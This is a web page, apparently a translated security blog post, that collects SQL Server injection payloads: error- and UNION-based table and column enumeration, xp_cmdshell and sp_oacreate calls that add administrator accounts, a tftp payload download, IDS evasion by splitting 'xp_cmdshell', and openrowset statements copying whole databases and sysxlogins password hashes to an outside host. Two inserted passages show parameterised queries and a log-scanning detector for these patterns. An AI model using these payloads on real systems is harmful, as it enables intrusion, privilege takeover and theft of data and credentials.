SQL Injection Summary

Source: Internet
Author: User
SQL Injection Summary (from the early ' or '1'='1 onward)

Most important system table names:
select * from sysobjects
sysobjects, ncsysobjects
sysindexes, tsysindexes
syscolumns
systypes
sysusers
sysdatabases
sysxlogins
sysprocesses


Some of the most important user and role names (present in a default SQL Server database):
public
dbo
guest (generally disabled, or not granted permissions)
db_securityadmin
db_ddladmin

Some default extended stored procedures:

xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
xp_availablemedia        drive information
xp_dirtree               directory tree
xp_enumdsn               ODBC connections
xp_loginconfig           server security mode information
xp_makecab               create a compressed archive
xp_ntsec_enumdomains     domain information
xp_terminate_process     terminate a process, given a PID

For example:
sp_addextendedproc 'xp_webserver', 'c:\temp\xp_foo.dll'
exec xp_webserver
sp_dropextendedproc 'xp_webserver'
bcp "select * from test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar
' group by users.id having 1=1--
' group by users.id, users.username, users.password, users.privs having 1=1--
'; insert into users values(666, 'attacker', 'foobar', 0xffff)--

union select top 1 column_name from information_schema.columns where table_name='logintable'--
union select top 1 column_name from information_schema.columns where table_name='logintable' and column_name not in ('login_id')--
union select top 1 column_name from information_schema.columns where table_name='logintable' and column_name not in ('login_id', 'login_name')--
union select top 1 login_name from logintable--
union select top 1 password from logintable where login_name='rahul'--
Constructed statements (checking the version, the current user, and whether xp_cmdshell exists):
' union select @@version, 1, 1, 1--
and 1=(select @@version)
and 'sa'=(select system_user)
' union select ret, 1, 1, 1 from foo--
' union select min(username), 1, 1, 1 from users where username > 'a'--
' union select min(username), 1, 1, 1 from users where username > 'admin'--
' union select password, 1, 1, 1 from users where username='admin'--
and user_name()='dbo'
and 0<>(select user_name())--
; declare @shell int exec sp_oacreate 'wscript.shell', @shell output exec sp_oamethod @shell, 'run', null, 'c:\winnt\system32\cmd.exe /c net user swap 5245886 /add'
and 1=(select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell')
; exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'


1=(%20select%20count(*)%20from%20master.dbo.sysobjects%20where%20xtype='x'%20and%20name='xp_cmdshell')
and 1=(select is_srvrolemember('sysadmin'))   determines whether the current login has sysadmin (sa-level) permission
and 0<>(select top 1 paths from newtable)--   database exposure ("bauku") technique
and 1=(select name from master.dbo.sysdatabases where dbid=7)   obtains a database name (dbid 1 to 5 are system databases; 6 and above can be probed)
Create a virtual directory for the E drive:
declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', null, 'cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "Default Web Site" -v "E","E:\"'
Set access properties (to allow writing a webshell):
declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', null, 'cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/root/e +browse'


and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
Submit dbid=7, 8, 9 ... in turn to get more database names.
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U')   exposes a table name, assumed here to be admin

and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('admin'))   gets the other tables
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id)))   exposes the uid value, assumed here to be 18779569 (uid=id)
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569)   gets a field of admin, assumed here to be user_id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in ('id', ...))   exposes the other fields
and 0<(select user_id from bbs.dbo.admin where username>1)   can get the user name
The password can be obtained the same way ... assuming fields such as user_id, username, password, etc.

show.asp?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
show.asp?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin
(The union statement is used everywhere, and works well against Access too.)

Database exposure ("bauku") special trick: submit %5c in place of the ' or / character.
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U')   gets the table name
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('address'))
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id)))   to determine the id value
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=773577794)   all fields

http://xx.xx.xx.xx/111.asp?id=3400;create table [dbo].[swap] ([swappass] [char](255));--

http://xx.xx.xx.xx/111.asp?id=3400 and (select top 1 swappass from swap)=1
create table newtable (id int identity(1,1), paths varchar) declare @test varchar() exec master..xp_regread @rootkey='hkey_local_machine', @key='system\currentcontrolset\services\w3svc\parameters\virtual roots\', @value_name='/', @value=@test output insert into newtable (paths) values (@test)

http://61.131.96.39/PageShow.asp?Tianname=Policy and Regulation&infoid={57c4165a-4206-4c0d-a8d2-e70666ee4e08};use%20master;declare%20@s%20int;exec%20sp_oacreate%20"wscript.shell",@s%20out;exec%20sp_oamethod%20@s,"run",null,"cmd.exe%20/c%20ping%201.1.1.1";--


Having got the web path d:\xxxx, next:
http://xx.xx.xx.xx/111.asp?id=3400;use ku1;--
http://xx.xx.xx.xx/111.asp?id=3400;create table cmd (str image);--


The traditional xp_cmdshell testing process:
; exec master..xp_cmdshell 'dir'
; exec master.dbo.sp_addlogin hax;--
; exec master.dbo.sp_password null,hax,hax;--
; exec master.dbo.sp_addsrvrolemember hax sysadmin;--
; exec master.dbo.xp_cmdshell 'net user hax 5258 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
; exec master.dbo.xp_cmdshell 'net localgroup administrators hax /add';--
exec master..xp_servicecontrol 'start', 'schedule'
exec master..xp_servicecontrol 'start', 'server'
http://www.xxx.com/list.asp?classid=1; declare @shell int exec sp_oacreate 'wscript.shell', @shell output exec sp_oamethod @shell, 'run', null, 'c:\winnt\system32\cmd.exe /c net user swap 5258 /add'
; declare @shell int exec sp_oacreate 'wscript.shell', @shell output exec sp_oamethod @shell, 'run', null, 'c:\winnt\system32\cmd.exe /c net localgroup administrators swap /add'

http://localhost/show.asp?id=1'; exec master..xp_cmdshell 'tftp -i youip get file.exe'--

declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'
; declare @a sysname; set @a=db_name(); backup database @a to disk='\\<your IP>\<your shared directory>\bak.dat'
If that is restricted, the following can be used instead:
select * from openrowset('sqloledb', 'server';'sa';'', 'select ''ok!'' exec master.dbo.sp_addlogin hax')
Traditional query constructs:
select * from news where id=... and topic=... and .....
admin' and 1=(select count(*) from [user] where username='victim' and right(left(userpass,01),1)='1') and userpass<>'
select 123;--
; use master;--
a' or name like 'fff%';--   shows a user named ffff.
' and 1<>(select count(email) from [user]);--
; update [users] set email=(select top 1 name from sysobjects where xtype='u' and status>0) where name='ffff';--
Description:
The statement above fetches the first user table in the database and places its name in the email field of the ffff user.
By viewing ffff's user profile, you get the name of the first user table, here called ad.
Then get the id of this table from the table name ad:
ffff'; update [users] set email=(select top 1 id from sysobjects where xtype='u' and name='ad') where name='ffff';--

The name of the second table can be obtained as follows:
ffff'; update [users] set email=(select top 1 name from sysobjects where xtype='u' and id>581577110) where name='ffff';--
ffff'; update [users] set email=(select top 1 count(ids) from password) where name='ffff';--
ffff'; update [users] set email=(select top 1 pwd from password where id=2) where name='ffff';--

ffff'; update [users] set email=(select top 1 name from password where id=2) where name='ffff';--

exec master..xp_servicecontrol 'start', 'schedule'
exec master..xp_servicecontrol 'start', 'server'
sp_addextendedproc 'xp_webserver', 'c:\temp\xp_foo.dll'
The extended stored procedure can then be invoked in the usual way:
exec xp_webserver
Once the extended stored procedure has been executed, it can be removed like this:
sp_dropextendedproc 'xp_webserver'

insert into users values(666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--

insert into users values(667, 123, 123, 0xffff)--

insert into users values(123, 'admin'--', 'password', 0xffff)--

; and user>0
;; and (select count(*) from sysobjects)>0
;; and (select count(*) from msysobjects)>0   // this is an Access database

-----------------------------------------------------------Some common introductions to injection:
(A) id=49: the parameter of this type of injection is numeric, and the SQL statement looks roughly like this:
select * from <table name> where <field>=49
The injected parameter is id=49 and [query condition], that is, the generated statement:
select * from <table name> where <field>=49 and [query condition]

(B) class=series: the parameter of this type of injection is a string, and the original SQL statement looks roughly like this:
select * from <table name> where <field>='series'
The injected parameter is class=series' and [query condition] and ''=', that is, the generated statement:
select * from <table name> where <field>='series' and [query condition] and ''=''
(C) When a search does not filter its parameters, such as keyword=keyword, the original SQL statement looks roughly like this:
select * from <table name> where <field> like '%keyword%'
The injected parameter is keyword=' and [query condition] and '%25'=, that is, the generated statement:
select * from <table name> where <field> like '%' and [query condition] and '%'='%'
;; and (select top 1 name from sysobjects where xtype='U' and status>0)>0
sysobjects is the SQL Server system table that stores all tables, views, constraints and other objects; xtype='U' and status>0 select the tables created by users. The statement above takes the first table name out and compares it with 0, so that the error message exposes the table name.
;; and (select top 1 col_name(object_id('<table name>'),1) from sysobjects)>0
After the table name has been obtained from the previous statement, object_id('<table name>') gives the table's internal id, and col_name(<table id>, 1) gives the name of the table's first field; replacing 1 with 2, 3, 4 ... yields the table's field names one by one.
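The three injection classes described above come down to one defect: the parameter value is pasted into the statement text, so a quote or a bare "and" in the value changes the query's shape. The example below is added here and is not code from the original page; it builds each class (A numeric, B string, C LIKE search) the vulnerable way and the safe way with bound parameters, using the page's own ' or '1'='1 shape as input. SQLite stands in for SQL Server so it runs offline; the table, rows and the ? placeholder are the example's own assumptions (ADO or sp_executesql parameters serve the same purpose on SQL Server).

```python
import sqlite3

# Added example (not from the original page): the three injection classes, (A) numeric,
# (B) string and (C) LIKE search, built by string concatenation and with bound parameters.
# SQLite stands in for SQL Server; the table and its rows are constructed for the example.

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table news (id integer, class text, title text)")
    conn.executemany("insert into news values (?, ?, ?)",
                     [(49, "series", "public notice"), (50, "internal", "staff memo")])
    return conn

def _ids(cursor):
    return sorted(row[0] for row in cursor)

# (A) numeric parameter: id=49
def query_numeric_vulnerable(conn, id_param):
    sql = "select id from news where id=" + id_param      # "49 and [condition]" goes straight in
    return _ids(conn.execute(sql))

def query_numeric_safe(conn, id_param):
    # int() rejects anything but digits, and the bound value is never parsed as SQL
    return _ids(conn.execute("select id from news where id=?", (int(id_param),)))

# (B) string parameter: class=series
def query_string_vulnerable(conn, cls):
    sql = "select id from news where class='" + cls + "'"  # the closing quote can be hijacked
    return _ids(conn.execute(sql))

def query_string_safe(conn, cls):
    return _ids(conn.execute("select id from news where class=?", (cls,)))

# (C) unfiltered search parameter: keyword=...
def query_like_vulnerable(conn, keyword):
    sql = "select id from news where title like '%" + keyword + "%'"
    return _ids(conn.execute(sql))

def query_like_safe(conn, keyword):
    # wildcards are added to the bound value, never to the statement text; escaping
    # '%' and '_' inside the keyword is a separate concern not handled here
    return _ids(conn.execute("select id from news where title like ?", ("%" + keyword + "%",)))

if __name__ == "__main__":
    c = make_db()
    print(query_numeric_vulnerable(c, "49 or 1=1"))          # [49, 50]: condition spliced in
    print(query_string_vulnerable(c, "series' or '1'='1"))   # [49, 50]
    print(query_string_safe(c, "series' or '1'='1"))         # []: treated as a literal class name
```

The safe variants return nothing for the injected inputs because the whole value is compared as one literal; the numeric variant additionally refuses non-numeric input outright, which is the cheapest check for class (A).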


Contents of post.htm (mainly to make input convenient):
<iframe name=p src=# width=800 height=350 frameborder=0></iframe>
<br>
<form action=http://test.com/count.asp target=p>
<input name="id" value="1552;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0);--" style="width:750">
<input type=submit value=">>>">
<input type=hidden name=fno value="2, 3">
</form>
Name of the data table:
id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0);--
This updates the first table name into the aaa field.
After reading out the first table, the second table can be read the same way by adding "and name<>'<the table name just obtained>'" to the condition:
id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0 and name<>'<table name just obtained>');--
Then id=1552 and exists (select * from aaa where aaa>5)
reads out the second table; read each one in turn until no more remain.
Read the fields like this:
id=1552;update aaa set aaa=(select top 1 col_name(object_id('<table name>'),1));--
Then id=1552 and exists (select * from aaa where aaa>5) raises an error that gives the field name
id=1552;update aaa set aaa=(select top 1 col_name(object_id('<table name>'),2));--
Then id=1552 and exists (select * from aaa where aaa>5) raises an error that gives the field name
--------------------------------Advanced techniques:
[Get data table names] [Update a field value to the table name, then try to read the field value to obtain the table name]
update <table name> set <field>=(select top 1 name from sysobjects where xtype='U' and status>0 [and name<>'<table name you already got>', adding one more each time]) [where condition]
select top 1 name from sysobjects where xtype='U' and status>0 and name not in ('table1', 'table2', ...)
Build a database administrator account and a system administrator account through a SQL Server injection vulnerability [the current account must be in the sysadmin group]

[Get data table field names] [Update a field value to the field name, then try to read the field value to obtain the field name]
update <table name> set <field>=(select top 1 col_name(object_id('<data table name to query>'), <field column number, e.g. 1>)) [where condition]

Bypassing IDS detection [using variables]:
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'
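The variable trick above, the percent-encoded requests earlier on the page, and the char(0x63)+char(0x68)+... spelling of string literals all defeat a detector that looks for the literal text "xp_cmdshell". The example below is added here and is not code from the original page: a normaliser that percent-decodes, folds char() calls and 'a'+'b' concatenations to the string they produce, and only then matches request parameters against the procedure and system-object names this page relies on, run over a few constructed W3C-style web log lines. The watch list, the log format and the log lines are the example's own assumptions.

```python
import re
from urllib.parse import unquote

# Added example (not from the original page): undo the evasions used on this page
# (percent-encoding, 'xp_'+'cmdshell' splitting, char(0x..) concatenation) before
# matching request parameters against a watch list of names the page relies on.
# The watch list and the sample log lines below are constructed for the example.

WATCHLIST = (
    "xp_cmdshell", "sp_oacreate", "sp_oamethod", "sp_addextendedproc", "xp_regread",
    "xp_regwrite", "xp_dirtree", "xp_servicecontrol", "openrowset", "backup database",
    "sysobjects", "syscolumns", "sysxlogins",
)

_CHAR = re.compile(r"char\s*\(\s*(0x[0-9a-f]+|\d+)\s*\)", re.I)   # char(0x63) or char(99)
_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")               # 'a' + 'b'
_COMMENT = re.compile(r"/\*.*?\*/", re.S)                         # inline /* */ comments

def _char_to_literal(m):
    v = m.group(1)
    code = int(v, 16) if v.lower().startswith("0x") else int(v)
    return "'" + chr(code) + "'"

def normalise(value):
    """Return a lower-cased, decoded, constant-folded form of a request parameter."""
    s = value
    for _ in range(3):                 # repeat to undo double or triple percent-encoding
        s = unquote(s)
    s = _COMMENT.sub(" ", s)
    s = _CHAR.sub(_char_to_literal, s)  # char(0x63) -> 'c'
    while True:                        # fold 'a'+'b'+'c' -> 'abc' until nothing changes
        folded = _CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", s)
        if folded == s:
            break
        s = folded
    return re.sub(r"\s+", " ", s).strip().lower()

def find_indicators(value):
    """Names from WATCHLIST present in the normalised parameter value, in watch-list order."""
    norm = normalise(value)
    return [name for name in WATCHLIST if name in norm]

def scan_log(lines):
    """Scan W3C-style lines (date time c-ip method cs-uri-stem cs-uri-query sc-status)
    and return (1-based line number, indicators) for every line that matched."""
    hits = []
    for n, line in enumerate(lines, 1):
        fields = line.split()
        if len(fields) < 7:
            continue
        found = find_indicators(fields[5])   # cs-uri-query
        if found:
            hits.append((n, found))
    return hits

# Constructed log lines; the query strings reuse payload shapes from the page above.
SAMPLE_LOG = [
    "2004-03-01 10:00:01 10.0.0.5 GET /list.asp classid=1 200",
    "2004-03-01 10:00:02 10.0.0.5 GET /list.asp id=1;declare%20@a%20sysname%20set%20@a='xp_'%2B'cmdshell'%20exec%20@a%20'dir%20c:' 500",
    "2004-03-01 10:00:03 10.0.0.5 GET /show.asp id=1%20and%200%3C%3E(select%20top%201%20name%20from%20master.dbo.sysobjects) 500",
    "2004-03-01 10:00:04 10.0.0.5 GET /list.asp id=1;exec%20master..sp_oacreate%20'wscript.shell',@s%20out 200",
    "2004-03-01 10:00:05 10.0.0.5 GET /show.asp id=1%20and%20name=char(0x73)%2Bchar(0x79)%2Bchar(0x73)%2Bchar(0x6f)%2Bchar(0x62)%2Bchar(0x6a)%2Bchar(0x65)%2Bchar(0x63)%2Bchar(0x74)%2Bchar(0x73) 500",
]

if __name__ == "__main__":
    for n, found in scan_log(SAMPLE_LOG):
        print(n, found)
```

Folding runs to a fixed point, so 'xp'+'_cm'+'dshell' collapses in two passes and a ten-term char() chain collapses to the literal 'sysobjects'; matching on the normalised form rather than the raw request is what makes the split-string variant visible.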


1. Opening a remote database
Basic syntax:
select * from openrowset('sqloledb', 'server=servername;uid=sa;pwd=apachy_123', 'select * from table1')
Parameters: (1) the OLE DB provider name
2. The connection string parameter can take any form, including the port used to connect, such as:
select * from openrowset('sqloledb', 'uid=sa;pwd=apachy_123;network=dbmssocn;address=202.100.100.1,1433', 'select * from table')

To copy the entire database of the target host, first set up a connection from the target host to the database on your machine (how to establish a remote connection from the target host was shown just above), then insert all the remote tables into local tables.

Basic syntax:
insert into openrowset('sqloledb', 'server=servername;uid=sa;pwd=apachy_123', 'select * from table1') select * from table2
This statement copies all data from the table2 table on the target host into the table1 table in the remote database. In practice the IP address and port in the connection string are modified to point where needed, such as:
insert into openrowset('sqloledb', 'uid=sa;pwd=apachy_123;network=dbmssocn;address=202.100.100.1,1433', 'select * from table1') select * from table2

insert into openrowset('sqloledb', 'uid=sa;pwd=hack3r;network=dbmssocn;address=202.100.100.1,1433', 'select * from _sysdatabases')
select * from master.dbo.sysdatabases

insert into openrowset('sqloledb', 'uid=sa;pwd=hack3r;network=dbmssocn;address=202.100.100.1,1433', 'select * from _sysobjects')
select * from user_database.dbo.sysobjects

insert into openrowset('sqloledb', 'uid=sa;pwd=apachy_123;network=dbmssocn;address=202.100.100.1,1433', 'select * from _syscolumns')
select * from user_database.dbo.syscolumns

After that, the target host's database structure can be viewed from the local database, and copying the database itself is then straightforward:
insert into openrowset('sqloledb', 'uid=sa;pwd=apachy_123;network=dbmssocn;address=202.100.100.1,1433', 'select * from table1') select * from database..table1

insert into openrowset('sqloledb', 'uid=sa;pwd=apachy_123;network=dbmssocn;address=202.100.100.1,1433', 'select * from table2') select * from database..table2

......

3. Copying the database (above). 4. Hashes

This is actually an extended application of the database copy above. The hashes of login passwords are stored in sysxlogins. The method is as follows:
insert into openrowset('sqloledb', 'uid=sa;pwd=apachy_123;network=dbmssocn;address=202.100.100.1,1433', 'select * from _sysxlogins') select * from database.dbo.sysxlogins
Once the hashes are obtained, they can be brute-forced. That takes some luck and a lot of time.


Ways to traverse a directory:
First create a temporary table, temp:
5';create table temp (id nvarchar(255), num1 nvarchar(255), num2 nvarchar(255), num3 nvarchar(255));--
5';insert temp exec master.dbo.xp_availablemedia;--   get all current drives
5';insert into temp (id) exec master.dbo.xp_subdirs 'c:\';--   get the subdirectory list
5';insert into temp (id,num1) exec master.dbo.xp_dirtree 'c:\';--   get the directory tree of all subdirectories and insert it into the temp table

5';insert into temp (id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--   view the contents of a file
5';insert into temp (id) exec master.dbo.xp_cmdshell 'dir c:\';--
5';insert into temp (id) exec master.dbo.xp_cmdshell 'dir c:\*.asp /s /a';--
5';insert into temp (id) exec master.dbo.xp_cmdshell 'cscript c:\inetpub\adminscripts\adsutil.vbs enum w3svc'

5';insert into temp (id,num1) exec master.dbo.xp_dirtree 'c:\';--   (xp_dirtree is executable by public)
Write to table:
Statement 1: http://www.xxxxx.com/down/list.asp?id=1 and 1=(select is_srvrolemember('sysadmin'));--
Statement 2: http://www.xxxxx.com/down/list.asp?id=1 and 1=(select is_srvrolemember('serveradmin'));--
Statement 3: http://www.xxxxx.com/down/list.asp?id=1 and 1=(select is_srvrolemember('setupadmin'));--
Statement 4: http://www.xxxxx.com/down/list.asp?id=1 and 1=(select is_srvrolemember('securityadmin'));--
Statement 5: http://www.xxxxx.com/down/list.asp?id=1 and 1=(select is_srvrolemember('securityadmin'));--
Statement 6: http://www.xxxxx.com/down/list.asp?id=1 and 1=(select is_srvrolemember('diskadmin'));--
Statement 7: http://www.xxxxx.com/down/list.asp?id=1 and 1=(select is_srvrolemember('bulkadmin'));--
Statement 8: http://www.xxxxx.com/down/list.asp?id=1 and 1=(select is_srvrolemember('bulkadmin'));--
Statement 9: http://www.xxxxx.com/down/list.asp?id=1 and 1=(select is_member('db_owner'));--
Write the paths to the table:
http://www.xxxxx.com/down/list.asp?id=1;create table dirs (paths varchar(), id int)--
http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'c:\'--
http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)--
http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where paths not in ('@inetpub'))--
Statement: http://www.xxxxx.com/down/list.asp?id=1;create table dirs1 (paths varchar(), id int)--
Statement: http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'e:\web'--
Statement: http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs1)--
Back up the database into the web directory, then download it:
http://www.xxxxx.com/down/list.asp?id=1;declare @a sysname; set @a=db_name(); backup database @a to disk='e:\web\down.bak';--


and%201=(select%20top%201%20name%20from%20(select%20top%2012%20id,name%20from%20sysobjects%20where%20xtype=char( ))%20t%20order%20by%20id%20desc)
and%201=(select%20top%201%20col_name(object_id('user_login'),1)%20from%20sysobjects)   refers to the related table
and 1=(select%20user_id%20from%20user_login)
and%200=(select%20user%20from%20user_login%20where%20user>1)
